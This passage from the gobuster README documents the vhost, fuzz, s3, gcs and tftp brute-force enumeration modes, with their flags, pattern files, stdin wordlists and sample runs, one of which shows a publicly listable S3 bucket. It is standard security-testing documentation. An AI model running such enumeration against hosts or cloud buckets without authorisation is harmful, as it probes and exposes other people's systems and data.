[flags] Flags: --append-domain Append main domain from URL to words from wordlist. Otherwise the fully qualified domains need to be specified in the wordlist. -c, --cookies string Cookies to use for the requests --domain string the domain to append when using an IP address as URL. If left empty and you specify a domain based URL the hostname from the URL is extracted --exclude-length ints exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes. -r, --follow-redirect Follow redirects -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' -h, --help help for vhost -m, --method string Use the following HTTP method (default "GET") -k, --no-tls-validation Skip TLS certificate verification -P, --password string Password for Basic Auth --proxy string Proxy to use for requests [http(s)://host:port] --random-agent Use a random User-Agent string --retry Should retry on request timeout --retry-attempts int Times to retry on request timeout (default 3) --timeout duration HTTP Timeout (default 10s) -u, --url string The target URL -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") -U, --username string Username for Basic Auth Global Flags: --delay duration Time each thread waits between requests (e.g. 1500ms) --no-color Disable color output --no-error Don't display errors -z, --no-progress Don't display progress -o, --output string Output file to write results to (defaults to stdout) -p, --pattern string File containing replacement patterns -q, --quiet Don't print the banner and other noise -t, --threads int Number of concurrent threads (default 10) -v, --verbose Verbose output (errors) -w, --wordlist string Path to the wordlist ``` ### Examples ```text gobuster vhost -u https://mysite.com -w common-vhosts.txt ``` Normal sample run goes like this: ```text gobuster vhost -u https://mysite.com -w common-vhosts.txt =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://mysite.com [+] Threads: 10 [+] Wordlist: common-vhosts.txt [+] User Agent: gobuster/3.2.0 [+] Timeout: 10s =============================================================== 2019/06/21 08:36:00 Starting gobuster =============================================================== Found: www.mysite.com Found: piwik.mysite.com Found: mail.mysite.com =============================================================== 2019/06/21 08:36:05 Finished =============================================================== ``` ## `fuzz` Mode ### Options ```text Uses fuzzing mode Usage: gobuster fuzz [flags] Flags: -c, --cookies string Cookies to use for the requests --exclude-length ints exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes. -b, --excludestatuscodes string Negative status codes (will override statuscodes if set) -r, --follow-redirect Follow redirects -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' -h, --help help for fuzz -m, --method string Use the following HTTP method (default "GET") -k, --no-tls-validation Skip TLS certificate verification -P, --password string Password for Basic Auth --proxy string Proxy to use for requests [http(s)://host:port] --random-agent Use a random User-Agent string --retry Should retry on request timeout --retry-attempts int Times to retry on request timeout (default 3) --timeout duration HTTP Timeout (default 10s) -u, --url string The target URL -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") -U, --username string Username for Basic Auth Global Flags: --delay duration Time each thread waits between requests (e.g. 1500ms) --no-color Disable color output --no-error Don't display errors -z, --no-progress Don't display progress -o, --output string Output file to write results to (defaults to stdout) -p, --pattern string File containing replacement patterns -q, --quiet Don't print the banner and other noise -t, --threads int Number of concurrent threads (default 10) -v, --verbose Verbose output (errors) -w, --wordlist string Path to the wordlist ``` ### Examples ```text gobuster fuzz -u https://example.com?FUZZ=test -w parameter-names.txt ``` ## `s3` Mode ### Options ```text Uses aws bucket enumeration mode Usage: gobuster s3 [flags] Flags: -h, --help help for s3 -m, --maxfiles int max files to list when listing buckets (only shown in verbose mode) (default 5) -k, --no-tls-validation Skip TLS certificate verification --proxy string Proxy to use for requests [http(s)://host:port] --random-agent Use a random User-Agent string --retry Should retry on request timeout --retry-attempts int Times to retry on request timeout (default 3) --timeout duration HTTP Timeout (default 10s) -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") Global Flags: --delay duration Time each thread waits between requests (e.g. 1500ms) --no-color Disable color output --no-error Don't display errors -z, --no-progress Don't display progress -o, --output string Output file to write results to (defaults to stdout) -p, --pattern string File containing replacement patterns -q, --quiet Don't print the banner and other noise -t, --threads int Number of concurrent threads (default 10) -v, --verbose Verbose output (errors) -w, --wordlist string Path to the wordlist ``` ### Examples ```text gobuster s3 -w bucket-names.txt ``` ## `gcs` Mode ### Options ```text Uses gcs bucket enumeration mode Usage: gobuster gcs [flags] Flags: -h, --help help for gcs -m, --maxfiles int max files to list when listing buckets (only shown in verbose mode) (default 5) -k, --no-tls-validation Skip TLS certificate verification --proxy string Proxy to use for requests [http(s)://host:port] --random-agent Use a random User-Agent string --retry Should retry on request timeout --retry-attempts int Times to retry on request timeout (default 3) --timeout duration HTTP Timeout (default 10s) -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") Global Flags: --delay duration Time each thread waits between requests (e.g. 1500ms) --no-color Disable color output --no-error Don't display errors -z, --no-progress Don't display progress -o, --output string Output file to write results to (defaults to stdout) -p, --pattern string File containing replacement patterns -q, --quiet Don't print the banner and other noise -t, --threads int Number of concurrent threads (default 10) -v, --verbose Verbose output (errors) -w, --wordlist string Path to the wordlist ``` ### Examples ```text gobuster gcs -w bucket-names.txt ``` ## `tftp` Mode ### Options ```text Uses TFTP enumeration mode Usage: gobuster tftp [flags] Flags: -h, --help help for tftp -s, --server string The target TFTP server --timeout duration TFTP timeout (default 1s) Global Flags: --delay duration Time each thread waits between requests (e.g. 1500ms) --no-color Disable color output --no-error Don't display errors -z, --no-progress Don't display progress -o, --output string Output file to write results to (defaults to stdout) -p, --pattern string File containing replacement patterns -q, --quiet Don't print the banner and other noise -t, --threads int Number of concurrent threads (default 10) -v, --verbose Verbose output (errors) -w, --wordlist string Path to the wordlist ``` ### Examples ```text gobuster tftp -s tftp.example.com -w common-filenames.txt ``` ## Wordlists via STDIN Wordlists can be piped into `gobuster` via stdin by providing a `-` to the `-w` option: ```bash hashcat -a 3 --stdout ?l | gobuster dir -u https://mysite.com -w - ``` Note: If the `-w` option is specified at the same time as piping from STDIN, an error will be shown and the program will terminate. ## Patterns You can supply pattern files that will be applied to every word from the wordlist. Just place the string `{GOBUSTER}` in it and this will be replaced with the word. This feature is also handy in s3 mode to pre- or postfix certain patterns. **Caution:** Using a big pattern file can cause a lot of request as every pattern is applied to every word in the wordlist. ### Example file ```text {GOBUSTER}Partial {GOBUSTER}Service PRE{GOBUSTER}POST {GOBUSTER}-prod {GOBUSTER}-dev ``` #### Use case in combination with patterns - Create a custom wordlist for the target containing company names and so on - Create a pattern file to use for common bucket names. ```bash curl -s --output - https://raw.githubusercontent.com/eth0izzle/bucket-stream/master/permutations/extended.txt | sed -s 's/%s/{GOBUSTER}/' > patterns.txt ``` - Run gobuster with the custom input. Be sure to turn verbose mode on to see the bucket details ```text gobuster s3 --wordlist my.custom.wordlist -p patterns.txt -v ``` Normal sample run goes like this: ```text PS C:\Users\firefart\Documents\code\gobuster> .\gobuster.exe s3 --wordlist .\wordlist.txt =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Threads: 10 [+] Wordlist: .\wordlist.txt [+] User Agent: gobuster/3.2.0 [+] Timeout: 10s [+] Maximum files to list: 5 =============================================================== 2019/08/12 21:48:16 Starting gobuster in S3 bucket enumeration mode =============================================================== webmail hacking css img www dav web localhost =============================================================== 2019/08/12 21:48:17 Finished =============================================================== ``` Verbose and sample run ```text PS C:\Users\firefart\Documents\code\gobuster> .\gobuster.exe s3 --wordlist .\wordlist.txt -v =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Threads: 10 [+] Wordlist: .\wordlist.txt [+] User Agent: gobuster/3.2.0 [+] Verbose: true [+] Timeout: 10s [+] Maximum files to list: 5 =============================================================== 2019/08/12 21:49:00 Starting gobuster in S3 bucket enumeration mode =============================================================== www [Error: All access to this object has been disabled (AllAccessDisabled)] hacking [Error: Access Denied (AccessDenied)] css [Error: All access to this object has been disabled (AllAccessDisabled)] webmail [Error: All access to this object has been disabled (AllAccessDisabled)] img [Bucket Listing enabled: GodBlessPotomac1.jpg (1236807b), HOMEWORKOUTAUDIO.zip (203908818b), ProductionInfo.xml (11946b), Start of Perpetual Motion Logo-1.mp3 (621821b), addressbook.gif (3115b)] web [Error: Access Denied (AccessDenied)] dav [Error: All access to this object has been disabled (AllAccessDisabled)] localhost [Error: Access Denied (AccessDenied)] =============================================================== 2019/08/12 21:49:01 Finished =============================================================== ``` Extended sample run ```text PS C:\Users\firefart\Documents\code\gobuster> .\gobuster.exe s3 --wordlist .\wordlist.txt -e =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Threads: 10 [+] Wordlist: .\wordlist.txt [+] User Agent: gobuster/3.2.0 [+] Timeout: 10s [+] Expanded: true [+] Maximum files to list: 5 =============================================================== 2019/08/12 21:48:38 Starting gobuster in S3 bucket enumeration mode =============================================================== http://css.s3.amazonaws.com/ http://www.s3.amazonaws.com/ http://webmail.s3.amazonaws.com/ http://hacking.s3.amazonaws.com/ http://img.s3.amazonaws.com/ http://web.s3.amazonaws.com/ http://dav.s3.amazonaws.com/ http://localhost.s3.amazonaws.com/ =============================================================== 2019/08/12 21:48:38 Finished =============================================================== ```